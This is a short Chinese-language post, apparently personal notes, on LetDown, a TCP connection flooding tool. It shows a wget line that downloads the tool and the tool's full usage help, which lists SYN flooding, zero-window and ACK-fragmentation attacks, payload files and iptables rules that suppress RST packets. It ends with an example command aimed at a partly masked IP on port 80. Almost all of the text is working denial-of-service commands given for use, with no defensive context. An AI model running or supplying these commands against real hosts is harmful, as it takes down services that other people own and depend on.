一个切断 TCP 连接的东西 和它的名字一样
wget http://sourceforge.net/projects/complemento/files/latest/download?source=files
[root Dialog]# letdown
LetDown 3wh+payload flooder v0.7.7.2 - Acri Emanuele (crossbower@gmail.com) Usage: letdown -d dst_ip -p dst_port -D dst_mac [options] Options: -d destination ip address, target -D destination mac address or router mac address -p destination port -s source ip address -S source mac address -x first source port (default 1025) -y last source port (default 65534) -l enables infinite loop mode -i network interface -t sleep time in microseconds (default 10000) -a max time in second for waiting responses Extra options: -v verbosity level (0=quiet, 1=normal, 2=verbose) -f automagically set firewall rules for blocking rst packet generated by the kernel examples: -f iptables, -f blackhole (for freebsd) -L special interaction levels with the target s syn flooding, no 3-way-handshake a send acknowledgment packets (polite mode) f send finalize packets (include polite mode) r send reset packets (check firewall rules...) -W window size for ack packets (ex: 0-window attack) -O enable ack fragmentation and set fragment offset delta -C fragment counter if fragmentation is enabled (default 1) -P payload file (see payloads directory...) -M multistage payload file (see payloads directory...) 简单的使用[root letdown]# ./letdown -d 59.69.xx.xx -p 80 -i eth0 -D 14:DA:E9:C8:05:6A -f iptables
LetDown start: Mon May 13 23:03:41 2013 ^Ckilling child processes...